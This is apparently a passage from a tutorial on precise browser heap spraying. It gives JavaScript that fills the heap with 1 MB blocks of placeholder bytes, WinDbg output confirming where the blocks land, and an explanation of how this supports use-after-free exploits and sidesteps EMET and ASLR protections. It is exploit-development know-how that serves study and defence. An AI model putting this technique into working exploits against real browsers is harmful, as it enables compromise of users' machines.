var shellcode = "\u4141";
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
onemeg += shellcode.substr(0, 64*1024/2);
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
spray[i] = onemeg.substr(0, onemeg.length);
<input type="button" value="Spray the heap" onclick="heapspray()"></input>
Look at the “VirtAlloc bytes” field for a heap with a large allocation. The heap address we’re interested in is the first one – “_HEAP 00360000”
Next, view the allocation statistics for that heap handle:
group-by: TOTSIZE max-display: 20
size
#blocks
total
( %) (percent of total busy bytes)
fffe0 65 - 64ff360
(99.12)
Our neat and tidy allocations really stand out here. There are exactly 0x65 (101 decimal) allocations of size 0xfffe0 (1 MB minus the 20 byte heap header).
A nice feature of WinDbg is that you can view heap chunks of a particular size. The following command lists all the heaps chunks of size 0xfffe0.
HEAP_ENTRY Size Prev Flags
UserPtr UserSize - state
037f0018 1fffc fffc
[00]
037f0020
fffe0 - (busy VirtualAlloc)
038f0018 1fffc fffc
[00]
038f0020
fffe0 - (busy VirtualAlloc)
039f0018 1fffc fffc
[00]
039f0020
fffe0 - (busy VirtualAlloc)
03af0018 1fffc fffc
[00]
03af0020
fffe0 - (busy VirtualAlloc)
03bf0018 1fffc fffc
[00]
03bf0020
fffe0 - (busy VirtualAlloc)
05e80018 1fffc fffc
[00]
05e80020
fffe0 - (busy VirtualAlloc)
05f80018 1fffc fffc
[00]
05f80020
fffe0 - (busy VirtualAlloc)
06080018 1fffc fffc
[00]
06080020
fffe0 - (busy VirtualAlloc)
06180018 1fffc fffc
[00]
06180020
fffe0 - (busy VirtualAlloc)
0aa80018 1fffc fffc
[00]
0aa80020
fffe0 - (busy VirtualAlloc)
0ab80018 1fffc fffc
[00]
0ab80020
fffe0 - (busy VirtualAlloc)
0ac80018 1fffc fffc
[00]
0ac80020
fffe0 - (busy VirtualAlloc)
0ad80018 1fffc fffc
[00]
0ad80020
fffe0 - (busy VirtualAlloc)
0ae80018 1fffc fffc
[00]
0ae80020
fffe0 - (busy VirtualAlloc)
0af80018 1fffc fffc
[00]
0af80020
fffe0 - (busy VirtualAlloc)
0b080018 1fffc fffc
[00]
0b080020
fffe0 - (busy VirtualAlloc)
0b180018 1fffc fffc
[00]
0b180020
fffe0 - (busy VirtualAlloc)
0b280018 1fffc fffc
[00]
0b280020
fffe0 - (busy VirtualAlloc)
0b380018 1fffc fffc
[00]
0b380020
fffe0 - (busy VirtualAlloc)
Note how each allocation is allocated in sequential order.
Now that we have the addresses of each heap chunk we can start to inspect memory for our 0x41’s:
06b80000
00 00 c8 06 00 00 a8 06-00 00 00 00 00 00 00 00 ................
06b80010
00 00 10 00 00 00 10 00-61 65 15 29 00 00 00 04 ........ae.)....
06b80020
da ff 0f 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
06b80030
41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
AAAAAAAAAAAAAAAA
06b80040
41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
AAAAAAAAAAAAAAAA
06b80050
41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
AAAAAAAAAAAAAAAA
06b80060
41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
AAAAAAAAAAAAAAAA
06b80070
41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
AAAAAAAAAAAAAAAA
You can clearly see the string length at offset 0x20 – 000fffda which is the length of the string minus the null terminator.
Another way to analyze your heap allocations is through the fragmentation view of VMmap – one of many incredibly useful tools in the Sysinternals suite. The following image shows an allocation of 1000MB. Within the fragmentation view you can zoom in and click on individual allocations and confirm that each heap allocation (in orange) begins at an address in the form of 0xXXXX0000.
So why is this technique so useful? This method of heap spraying is perfect when exploiting use-after-free vulnerabilities where an attacker can craft fake objects and vtable structures. A fake vtable pointer can then point to an address in the heap range – 0x11F50024 just as an example. Thus, there is no need to rely upon nops and no need to worry about EMET’s arbitrary prevention of executing 0x0C0C0C0C-style addresses. For all intents and purposes, you’ve completely bypassed ASLR protections.